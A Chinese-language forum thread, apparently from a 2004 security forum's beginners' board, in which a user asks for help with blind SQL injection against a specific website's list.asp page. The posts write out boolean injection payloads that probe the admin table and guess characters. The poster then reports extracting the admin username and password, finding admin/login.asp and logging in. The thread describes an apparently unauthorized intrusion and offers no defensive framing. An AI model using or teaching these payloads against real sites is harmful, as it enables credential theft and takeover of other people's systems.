|
 | 作者: markminasi [markminasi]
 论坛用户 |
登录 |
| 首先用了:list.asp?id=4466 and 1=1 成功! 然后用了:list.asp?id=4466 and 6=(select count(*) from admin) 成功! 然后猜到字段:username,password,id 然后用了:list.asp?id=4466 and 6=(select count(*) from admin where len(username)<7) 成功! 在用:list.asp?id=4466 and 6=(select count(*) from admin where left(username,1)='X') 上面'X'第一个字符都试了就是不行。 我应该怎么做下去啊。管理员表里有6条数据。怎么取一条然后来破解用户名呢? |
| 地主 发表时间: 04-03-17 10:14 |
 | 回复: afan271314 [afan271314]  论坛用户 |
登录 |
|
继续试啊 |
| B1层 发表时间: 04-03-17 10:17 |
| 回复: markminasi [markminasi] 论坛用户 |
登录 |
|
怎么继续试??? 我现在就是没办法猜字符啊? 用left语句要报错。 |
| B2层 发表时间: 04-03-17 10:55 |
| 回复: markminasi [markminasi] 论坛用户 |
登录 |
|
密码和用户名现在搞出来了。但不知道他的管理页面在哪里??? 怎么办啊? |
| B3层 发表时间: 04-03-17 11:30 |
| 回复: markminasi [markminasi] 论坛用户 |
登录 |
|
算了,已经找到了。admin/login.asp 进去看了看,东西很多,不敢乱来。 |
| B4层 发表时间: 04-03-17 12:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我已经到猜字符这步了。怎么不能下进行下去了啊。